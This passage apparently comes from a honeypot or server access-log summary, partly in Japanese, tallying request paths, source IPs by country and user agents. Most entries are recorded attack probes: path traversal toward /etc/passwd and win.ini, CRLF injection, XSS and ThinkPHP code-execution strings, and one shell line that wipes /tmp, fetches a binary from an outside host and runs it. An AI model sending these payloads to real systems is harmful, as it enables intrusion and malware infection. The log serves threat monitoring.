1	GET	`/static/data/thirdgames.json`	HTTP/1.1
1	GET	`/static/diff_worker.js`	HTTP/1.1
1	GET	`/static/index/css/iindex.css`	HTTP/1.1
1	GET	`/static/xianyu/js/bankCheck.js`	HTTP/1.1
1	GET	`/statics/js/API.js`	HTTP/1.1
1	GET	`/step1.asp`	HTTP/1.1
1	GET	`/style.css`	HTTP/1.1
1	GET	`/template/920ka/css/lsy.css`	HTTP/1.1
1	GET	`/template/920ka/js/woodyapp.js`	HTTP/1.1
1	GET	`/thriveGame.css`	HTTP/1.1
1	GET	`/user/Login`	HTTP/1.1
1	GET	`/user/login.html`	HTTP/1.1
1	GET	`/verification.asp`	HTTP/1.1
1	GET	`/views/home/home.js`	HTTP/1.1
1	GET	`/wap/`	HTTP/1.1
1	GET	`/wap/trading/lastKlineParameter`	HTTP/1.1
1	GET	`/waplogin.php`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php`	HTTP/1.1
2	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	GET	`/xy/`	HTTP/1.1
1	GET	`/zoushi`	HTTP/1.1
1	GET	`/zz2/address.php?gid=651`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/api/backstageManagement/system/systemConfigForPlatform`	HTTP/1.1
1	POST	`/api/system/system/config/get`	HTTP/1.1
1	POST	`/api/system/systemConfigs/getCustomerServiceLink`	HTTP/1.1
1	POST	`/api/user/ismustmobile`	HTTP/1.1
1	POST	`/biz/server/config`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/index/indexSymbol`	HTTP/1.1
1	POST	`/km.asmx/getPlatParam`	HTTP/1.1
1	POST	`/melody/api/v1/pageconfig/list`	HTTP/1.1
1	POST	`/result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/sys/setting/all`	HTTP/1.1
1	POST	`/user/getAllNicknames`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.44.172.31	Italy
1	20.106.129.87	United States
1	20.115.32.123	United States
4	23.236.147.154	Canada
12	43.132.160.145	Singapore
8	45.146.165.37	Russia
1	46.8.57.40	Czechia
5	50.31.21.10	United States
5	51.79.29.48	Canada
1	60.8.213.120	China
1	61.219.11.151	Taiwan
1	78.188.54.246	Turkey
2	83.143.86.62	Norway
1	85.202.169.113	Netherlands
2	94.232.43.63	Russia
1	109.237.103.9	Russia
1	116.72.242.250	India
1	143.198.132.167	United States
2	143.198.230.196	United States
1	157.55.173.236	United States
1	162.142.125.211	United States
1	162.142.125.222	United States
132	170.253.35.94	Spain
1	172.104.138.223	United States
69	180.92.143.166	Pakistan
1	182.127.129.86	China
4	185.254.196.223	Ukraine
1	192.241.206.82	United States
2	192.254.75.206	United States
2	193.56.29.26	United Kingdom
1	194.49.68.118	United States
1	209.17.97.58	United States

UserAgent一覧

件数	UserAgent
28	`-`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
132	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0`
15	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
5	`Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 Safari/602.1`
3	`Mozilla/5.0 zgrab/0.x`
69	`Nuclei - Open-source project (github[.]com/projectdiscovery/nuclei)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
4		`\x03`
1		`\x16\x03\x01\x01\x9d\x01`
2		`\x16\x03\x01\x01\xa7\x01`
1		`\x16\x03\x01\x01\xb4\x01`
3		`\x16\x03\x01`
1		`\x16\x03\x02\x01\x9a\x01`
1		`\x16\x03\x03\x01H\x01`
1		`\x16\x03\x03\x01V\x01`
1		`\x16\x03\x03\x01\x99\x01`
2		`\x16\x03\x03\x01\xa5\x01`
1	GET	`/%0ASet-Cookie%3Acrlfinjection/..`	HTTP/1.1
1	GET	`/%0ASet-Cookie:crlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/%0D%0ASet-Cookie:crlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/%0DSet-Cookie:crlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd`	HTTP/1.1
1	GET	`/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini`	HTTP/1.1
1	GET	`/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd`	HTTP/1.1
1	GET	`/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini`	HTTP/1.1
1	GET	`/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e`	HTTP/1.1
1	GET	`/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`	HTTP/1.1
1	GET	`/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini`	HTTP/1.1
1	GET	`/'`	HTTP/1.1
1	GET	`/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd`	HTTP/1.1
1	GET	`/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini`	HTTP/1.1
1	GET	`/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd`	HTTP/1.1
1	GET	`/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini`	HTTP/1.1
1	GET	`/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/..%5cetc/passwd`	HTTP/1.1
1	GET	`/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd`	HTTP/1.1
1	GET	`/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini`	HTTP/1.1
2	GET	`/./../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/./../../../../../../../../../../windows/win.ini`	HTTP/1.1
17	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
2	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection	HTTP/1.1
1	GET	`/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini`	HTTP/1.1
1	GET	`/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini`	HTTP/1.1
1	GET	`/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
2	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2011/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2012/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2014/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA2015/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2016/index.php?lang=en`	HTTP/1.1
3	GET	`/PMA2018/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA2020/index.php?lang=en`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
2	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/adm/file.cgi?next_file=%2fetc%2fpasswd`	HTTP/1.1
1	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/pMA/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
1	GET	`/admincp`	HTTP/1.1
1	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
1	GET	`/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22`	HTTP/1.1
1	GET	`/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/database/index.php?lang=en`	HTTP/1.1
1	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/websql/index.php?lang=en`	HTTP/1.1
2	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/docpicker/internal_proxy/http/example.com`	HTTP/1.1
1	GET	`/etc/passwd`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/forum`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E`	HTTP/1.1
1	GET	`/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E`	HTTP/1.1
1	GET	`/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.php?sl=../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e`	HTTP/1.1
1	GET	`/logs`	HTTP/1.1
1	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/nmaplowercheck1644600740`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.7-english/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.0-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.1-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2014/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
4	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
1	GET	`/phppma/index.php?lang=en`	HTTP/1.1
2	GET	`/pma2011/index.php?lang=en`	HTTP/1.1
1	GET	`/pma2013/index.php?lang=en`	HTTP/1.1
1	GET	`/pma2016/index.php?lang=en`	HTTP/1.1
2	GET	`/pma2017/index.php?lang=en`	HTTP/1.1
1	GET	`/pma2018/index.php?lang=en`	HTTP/1.1
1	GET	`/program/index.php?lang=en`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
4	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm`
4	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
4	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin4/index.php?lang=en`	HTTP/1.1
3	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
4	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
4	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/src/redirect.php?plugins[]=../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search`	HTTP/1.1
1	GET	`/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search`	HTTP/1.1
1	GET	`/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5c..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5c..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5c..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5c..%5cetc/passwd`	HTTP/1.1
1	GET	`/static/..%5cetc/passwd`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	GET	`/wps/PA_WCM_Authoring_UI/proxy/http/example.com`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/login.action`	HTTP/1.1
1	POST	`/result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0